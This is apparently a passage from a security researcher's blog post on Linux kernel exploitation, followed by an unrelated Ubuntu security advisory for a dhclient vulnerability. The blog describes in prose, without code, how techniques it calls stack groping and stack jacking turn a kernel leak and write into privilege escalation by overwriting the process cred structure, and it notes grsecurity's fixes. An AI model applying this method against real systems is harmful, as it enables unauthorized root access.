Stack groping: If our end goal is to read the address of our process’ cred structure and use our write to modify it and escalate privileges, we need to turn our kleak+kwrite into an arbitrary read. We discovered two such techniques to do this: (1) the Rosengrope technique that modifies addr_limit in thread_info metadata stored at the base of the kstack to allow arbitrary reads from kernel space to userspace; and (2) the Obergrope technique that manipulates saved registers within a kernel stack frame that are later popped and used as the source address for copy_to_user()/put_user() operations.
Stack jacking: After constructing our arbitrary read from a kleak+kwrite, we read the task_struct address out of thread_info at the base of the kstack and then read the cred struct address out of task_struct. Armed with the address of our process’ credential structure and an arbitrary write, we modified our uids/gids/caps to escalate privileges.

For the full details, please see the presentation materials and PoC code:

The Response

If you haven’t yet read spender’s response to our presentation, I recommend doing so. While I’ll refrain from commenting on the political aspects of his post, I’ll happily comment on the technical aspects. The fixes that spender and pipacs have released have mitigated the particular exploit vectors we used to perform the stack groping stage of our attack against the grsec/PaX kernel:

The thread_info struct has been moved out from the base of the kernel stack preventing the Rosengrope technique from being able to write KERNEL_DS into the addr_limit member.
The RANDKSTACK feature, now available on both i386 and amd64, frustrates the Obergrope technique as the randomization of the kernel stack pointer on each system call makes writing into a particular offset in the stack frame unreliable.

Props to spender and pipacs for cranking out those fixes as well as a number of other enhancements. While the latest grsecurity patch effectively prevents the current vectors we discovered and presented in our talks at HES and Infiltrate, there are several loose ends I need to investigate to ensure the fixes address other potential exploitation vectors.
More on that later…

DHCP vulnerability in some Ubuntu releases

Ubuntu Security Notice USN-1108-2
April 19, 2011

dhcp3 vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 9.10

Summary:

An attacker's DHCP server could send crafted responses to your computer and
cause it to run programs as root.

Software Description:
- dhcp3: DHCP Client

Details:

USN-1108-1 fixed vulnerabilities in DHCP. Due to an error, the patch to fix
the vulnerability was not properly applied on Ubuntu 9.10 and higher. This
update fixes the problem.

Original advisory details:

 Sebastian Krahmer discovered that the dhclient utility incorrectly filtered
 crafted responses. An attacker could use this flaw with a malicious DHCP
 server to execute arbitrary code, resulting in root privilege escalation.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
  dhcp3-client                    3.1.3-2ubuntu6.2

Ubuntu 10.04 LTS:
  dhcp3-client                    3.1.3-2ubuntu3.2

Ubuntu 9.10:
  dhcp3-client                    3.1.2-1ubuntu7.3

In general, a standard system update will make all the necessary changes.

References:
  CVE-2011-0997

Package Information:
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu6.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu3.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.2-1ubuntu7.3